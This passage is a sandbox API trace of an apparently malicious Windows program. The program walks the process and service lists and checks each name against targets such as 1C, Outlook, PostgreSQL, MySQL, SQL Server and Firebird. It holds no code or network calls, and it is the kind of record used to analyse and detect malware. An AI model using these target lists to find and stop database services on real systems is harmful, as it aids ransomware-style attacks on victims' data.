lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0267.905] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0267.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0267.905] lstrlenW (lpString="Themes") returned 6 [0267.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0267.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0267.905] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0267.905] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0267.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0267.905] lstrlenW (lpString="UxSms") returned 5 [0267.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0267.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0267.905] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0267.905] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0267.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0267.905] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x42dd078 | out: hHeap=0x4a0000) returned 1 [0267.905] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0267.907] Process32FirstW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.907] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.908] lstrlenW (lpString="System") returned 6 [0267.908] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0267.908] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0267.908] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0267.908] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0267.908] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0267.908] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0267.908] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0267.908] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.908] lstrlenW (lpString="smss.exe") returned 8 [0267.908] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0267.908] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0267.908] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0267.909] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0267.909] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0267.909] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0267.909] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0267.909] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.909] lstrlenW (lpString="csrss.exe") returned 9 [0267.909] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.909] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.909] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.909] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.909] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.909] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.909] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.909] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.910] lstrlenW (lpString="wininit.exe") returned 11 [0267.910] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0267.910] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0267.910] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0267.910] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0267.910] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0267.910] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0267.910] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0267.910] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.910] lstrlenW (lpString="csrss.exe") returned 9 [0267.910] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.910] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.910] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.910] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.910] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.910] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.910] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.910] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.911] lstrlenW (lpString="winlogon.exe") returned 12 [0267.911] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0267.911] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0267.911] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0267.911] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0267.911] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0267.911] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0267.911] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0267.911] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.911] lstrlenW (lpString="services.exe") returned 12 [0267.911] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0267.911] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0267.911] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0267.911] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0267.911] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0267.911] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0267.911] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0267.911] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.912] lstrlenW (lpString="lsass.exe") returned 9 [0267.912] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0267.912] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0267.912] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0267.912] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0267.912] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0267.912] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0267.912] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0267.912] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0267.912] lstrlenW (lpString="lsm.exe") returned 7 [0267.912] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0267.912] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0267.912] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0267.912] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0267.912] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0267.912] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0267.912] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0267.912] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.913] lstrlenW (lpString="svchost.exe") returned 11 [0267.913] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.913] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.913] lstrlenW (lpString="svchost.exe") returned 11 [0267.913] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.913] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.914] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.914] lstrlenW (lpString="svchost.exe") returned 11 [0267.914] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.914] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.914] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.915] lstrlenW (lpString="svchost.exe") returned 11 [0267.915] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.915] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.915] lstrlenW (lpString="svchost.exe") returned 11 [0267.915] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.915] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.915] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.916] lstrlenW (lpString="audiodg.exe") returned 11 [0267.916] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0267.916] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0267.916] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0267.916] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0267.916] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0267.916] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0267.916] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0267.916] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.916] lstrlenW (lpString="svchost.exe") returned 11 [0267.916] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.916] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.916] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.916] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.916] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.916] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.917] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0267.917] lstrlenW (lpString="userinit.exe") returned 12 [0267.917] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0267.917] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0267.917] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0267.917] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0267.917] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0267.917] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0267.917] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0267.917] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.918] lstrlenW (lpString="explorer.exe") returned 12 [0267.918] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.918] lstrlenW (lpString="dwm.exe") returned 7 [0267.918] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.919] lstrlenW (lpString="svchost.exe") returned 11 [0267.919] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0267.919] lstrlenW (lpString="agent1c.exe") returned 11 [0267.919] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.919] lstrlenW (lpString="spoolsv.exe") returned 11 [0267.919] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0267.919] lstrlenW (lpString="reader_sl.exe") returned 13 [0267.920] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0267.920] lstrlenW (lpString="dllhost.exe") returned 11 [0267.920] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0267.920] lstrlenW (lpString="taskhost.exe") returned 12 [0267.920] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.920] lstrlenW (lpString="svchost.exe") returned 11 [0267.920] Process32NextW (in: hSnapshot=0x2f8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0267.921] CloseHandle (hObject=0x2f8) returned 1 [0267.921] Sleep (dwMilliseconds=0x1f4) [0268.566] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc3d0 [0268.618] EnumServicesStatusExW (in: hSCManager=0x42dc3d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0268.618] GetLastError () returned 0xea [0268.618] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa64) returned 0x4264fc0 [0268.618] EnumServicesStatusExW (in: hSCManager=0x42dc3d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4264fc0, cbBufSize=0xa64, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4264fc0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0268.618] CloseServiceHandle (hSCObject=0x42dc3d0) returned 1 [0268.619] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0268.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.619] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0268.619] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0268.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0268.619] lstrlenW (lpString="AudioSrv") returned 8 [0268.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0268.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0268.619] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0268.619] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0268.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0268.619] lstrlenW (lpString="BFE") returned 3 [0268.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0268.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0268.619] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0268.619] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0268.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0268.619] lstrlenW (lpString="CscService") returned 10 [0268.619] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0268.619] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0268.619] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0268.619] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0268.619] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0268.620] lstrlenW (lpString="DcomLaunch") returned 10 [0268.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.620] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0268.620] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0268.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0268.620] lstrlenW (lpString="Dhcp") returned 4 [0268.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0268.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0268.620] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0268.620] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0268.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0268.620] lstrlenW (lpString="Dnscache") returned 8 [0268.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0268.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0268.620] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0268.620] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0268.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0268.620] lstrlenW (lpString="eventlog") returned 8 [0268.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0268.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0268.620] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0268.620] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0268.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0268.620] lstrlenW (lpString="EventSystem") returned 11 [0268.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0268.620] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0268.620] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0268.620] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0268.620] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0268.620] lstrlenW (lpString="gpsvc") returned 5 [0268.620] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned 